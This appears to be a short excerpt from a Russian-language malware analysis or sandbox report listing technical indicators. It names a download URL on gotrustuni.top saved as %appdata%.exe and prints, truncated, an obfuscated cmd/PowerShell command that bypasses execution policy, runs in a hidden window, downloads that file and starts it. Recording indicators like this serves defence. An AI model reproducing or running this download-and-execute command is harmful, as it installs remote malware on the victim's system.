Техническая информация
- http://gotrustuni.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POWeRshElL.Exe -ExEcUTIOnPoLicY BPAsS -NoProFiLE -WIndowStYLe hIDdeN (new-oBjecT SsteM.neT.WEbcliEnt).DOwNLoaDFILe('http://gotrustuni.top/search.php','%APpdAtA%.exE');STaRt-pr...
- '<SYSTEM32>\cmd.exe' /c "POWeRshElL.Exe -ExEcUTIOnPoLicY BPAsS -NoProFiLE -WIndowStYLe hIDdeN (new-oBjecT SsteM.neT.WEbcliEnt).DOwNLoaDFILe('http://gotrustuni.top/search.php','%APpdAtA%.exE');STaRt-pr...' (со скрытым окном)